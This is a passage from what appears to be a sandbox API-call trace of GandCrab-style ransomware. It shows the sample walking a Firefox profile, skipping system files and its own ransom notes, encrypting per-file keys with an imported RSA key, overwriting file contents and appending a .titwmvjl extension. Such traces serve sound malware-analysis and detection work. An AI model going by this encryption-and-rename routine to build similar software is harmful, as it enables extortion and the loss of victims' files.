lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\TITWMVJL-DECRYPT.txt" [0084.195] lstrlenW (lpString=".titwmvjl") returned 9 [0084.195] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\TITWMVJL-DECRYPT.txt") returned 121 [0084.195] VirtualAlloc (lpAddress=0x0, dwSize=0x132, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.195] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 130 [0084.195] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\TITWMVJL-DECRYPT.txt") returned 121 [0084.195] lstrlenW (lpString=".txt") returned 4 [0084.195] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.195] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".txt ") returned 5 [0084.195] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0084.195] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.195] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\TITWMVJL-DECRYPT.txt") returned 121 [0084.195] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\TITWMVJL-DECRYPT.txt") returned 121 [0084.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0084.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0084.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0084.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0084.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0084.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0084.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0084.196] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0084.196] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.196] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0084.196] lstrcmpW (lpString1="upgrade.js-20170518000419", lpString2=".") returned 1 [0084.196] lstrcmpW (lpString1="upgrade.js-20170518000419", lpString2="..") returned 1 [0084.196] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\", lpString2="upgrade.js-20170518000419" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419" [0084.196] lstrlenW (lpString=".titwmvjl") returned 9 [0084.196] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419") returned 126 [0084.196] VirtualAlloc (lpAddress=0x0, dwSize=0x13c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.196] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419.titwmvjl") returned 135 [0084.196] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419") returned 126 [0084.196] lstrlenW (lpString=".js-20170518000419") returned 18 [0084.196] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.196] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".js-20170518000419 ") returned 19 [0084.196] lstrcmpiW (lpString1=".js-20170518000419", lpString2=".titwmvjl") returned -1 [0084.196] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.197] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419") returned 126 [0084.197] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419") returned 126 [0084.197] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="desktop.ini") returned 1 [0084.197] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="autorun.inf") returned 1 [0084.197] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="ntuser.dat") returned 1 [0084.197] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="iconcache.db") returned 1 [0084.197] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="bootsect.bak") returned 1 [0084.197] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="boot.ini") returned 1 [0084.197] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="ntuser.dat.log") returned 1 [0084.197] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="thumbs.db") returned 1 [0084.197] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0084.197] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0084.197] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="KRAB-DECRYPT.html") returned 1 [0084.197] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="CRAB-DECRYPT.html") returned 1 [0084.197] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="KRAB-DECRYPT.txt") returned 1 [0084.197] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="CRAB-DECRYPT.txt") returned 1 [0084.197] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="ntldr") returned 1 [0084.197] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="NTDETECT.COM") returned 1 [0084.197] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="Bootfont.bin") returned 1 [0084.197] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419") returned 126 [0084.197] lstrlenW (lpString=".js-20170518000419") returned 18 [0084.197] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.197] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".js-20170518000419 ") returned 19 [0084.197] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.197] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.197] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x248 [0084.198] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.198] ReadFile (in: hFile=0x248, lpBuffer=0x2310000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesRead=0x259e4f8*=0x21c, lpOverlapped=0x0) returned 1 [0084.205] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.206] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.206] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0084.210] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0084.210] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.210] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.210] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e4b4 | out: pbBuffer=0x259e4b4) returned 1 [0084.210] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.210] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.210] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.211] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.211] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0084.214] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0084.215] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.215] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.215] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e4d4 | out: pbBuffer=0x259e4d4) returned 1 [0084.215] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.215] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.215] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.215] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.215] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0084.219] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.219] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x5031f8) returned 1 [0084.219] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.219] CryptGetKeyParam (in: hKey=0x5031f8, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0084.219] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.220] CryptEncrypt (in: hKey=0x5031f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e44c*=0x100) returned 1 [0084.220] GetLastError () returned 0x0 [0084.220] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.220] CryptDestroyKey (hKey=0x5031f8) returned 1 [0084.220] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.220] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.220] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.221] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0084.223] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.223] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503738) returned 1 [0084.223] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.223] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0084.223] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.223] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e44c*=0x100) returned 1 [0084.224] GetLastError () returned 0x0 [0084.224] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.224] CryptDestroyKey (hKey=0x503738) returned 1 [0084.224] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.224] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.224] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0084.225] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0084.225] ReadFile (in: hFile=0x248, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e4f8*=0xa9b2, lpOverlapped=0x0) returned 1 [0084.248] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xffff564e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.248] WriteFile (in: hFile=0x248, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0xa9b2, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e4dc*=0xa9b2, lpOverlapped=0x0) returned 1 [0084.250] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.250] WriteFile (in: hFile=0x248, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e4dc*=0x21c, lpOverlapped=0x0) returned 1 [0084.251] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.257] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.257] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.257] CloseHandle (hObject=0x248) returned 1 [0084.258] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419.titwmvjl"), dwFlags=0x1) returned 1 [0084.259] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.259] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 0 [0084.259] FindClose (in: hFindFile=0x5037b8 | out: hFindFile=0x5037b8) returned 1 [0084.260] CloseHandle (hObject=0x2d4) returned 1 [0084.260] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0084.260] lstrcmpW (lpString1="sessionstore.js", lpString2=".") returned 1 [0084.260] lstrcmpW (lpString1="sessionstore.js", lpString2="..") returned 1 [0084.260] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="sessionstore.js" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js" [0084.260] lstrlenW (lpString=".titwmvjl") returned 9 [0084.260] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js") returned 95 [0084.260] VirtualAlloc (lpAddress=0x0, dwSize=0xfe, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.261] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js.titwmvjl") returned 104 [0084.261] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js") returned 95 [0084.261] lstrlenW (lpString=".js") returned 3 [0084.261] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.261] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".js ") returned 4 [0084.261] lstrcmpiW (lpString1=".js", lpString2=".titwmvjl") returned -1 [0084.261] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.261] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js") returned 95 [0084.261] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js") returned 95 [0084.261] lstrcmpiW (lpString1="sessionstore.js", lpString2="desktop.ini") returned 1 [0084.261] lstrcmpiW (lpString1="sessionstore.js", lpString2="autorun.inf") returned 1 [0084.261] lstrcmpiW (lpString1="sessionstore.js", lpString2="ntuser.dat") returned 1 [0084.261] lstrcmpiW (lpString1="sessionstore.js", lpString2="iconcache.db") returned 1 [0084.261] lstrcmpiW (lpString1="sessionstore.js", lpString2="bootsect.bak") returned 1 [0084.261] lstrcmpiW (lpString1="sessionstore.js", lpString2="boot.ini") returned 1 [0084.261] lstrcmpiW (lpString1="sessionstore.js", lpString2="ntuser.dat.log") returned 1 [0084.262] lstrcmpiW (lpString1="sessionstore.js", lpString2="thumbs.db") returned -1 [0084.262] lstrcmpiW (lpString1="sessionstore.js", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0084.262] lstrcmpiW (lpString1="sessionstore.js", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0084.262] lstrcmpiW (lpString1="sessionstore.js", lpString2="KRAB-DECRYPT.html") returned 1 [0084.262] lstrcmpiW (lpString1="sessionstore.js", lpString2="CRAB-DECRYPT.html") returned 1 [0084.262] lstrcmpiW (lpString1="sessionstore.js", lpString2="KRAB-DECRYPT.txt") returned 1 [0084.262] lstrcmpiW (lpString1="sessionstore.js", lpString2="CRAB-DECRYPT.txt") returned 1 [0084.262] lstrcmpiW (lpString1="sessionstore.js", lpString2="ntldr") returned 1 [0084.262] lstrcmpiW (lpString1="sessionstore.js", lpString2="NTDETECT.COM") returned 1 [0084.262] lstrcmpiW (lpString1="sessionstore.js", lpString2="Bootfont.bin") returned 1 [0084.262] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js") returned 95 [0084.262] lstrlenW (lpString=".js") returned 3 [0084.262] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.262] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".js ") returned 4 [0084.262] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.262] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.263] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0084.264] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.264] ReadFile (in: hFile=0x2d4, lpBuffer=0x2310000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0084.275] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.275] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.275] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0084.277] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0084.277] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.277] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.277] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0084.277] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.277] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.277] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.278] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.278] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0084.279] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0084.280] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.280] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.280] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0084.280] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.280] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.280] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.280] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.281] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0084.282] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.282] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503238) returned 1 [0084.282] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.282] CryptGetKeyParam (in: hKey=0x503238, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0084.283] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.283] CryptEncrypt (in: hKey=0x503238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0084.283] GetLastError () returned 0x0 [0084.283] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.283] CryptDestroyKey (hKey=0x503238) returned 1 [0084.283] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.283] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.284] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.284] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0084.285] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.285] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0084.286] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.286] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0084.286] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.286] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0084.286] GetLastError () returned 0x0 [0084.286] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.287] CryptDestroyKey (hKey=0x503738) returned 1 [0084.287] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.287] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.287] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0084.288] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0084.288] ReadFile (in: hFile=0x2d4, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e78c*=0x3da, lpOverlapped=0x0) returned 1 [0084.312] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffc26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 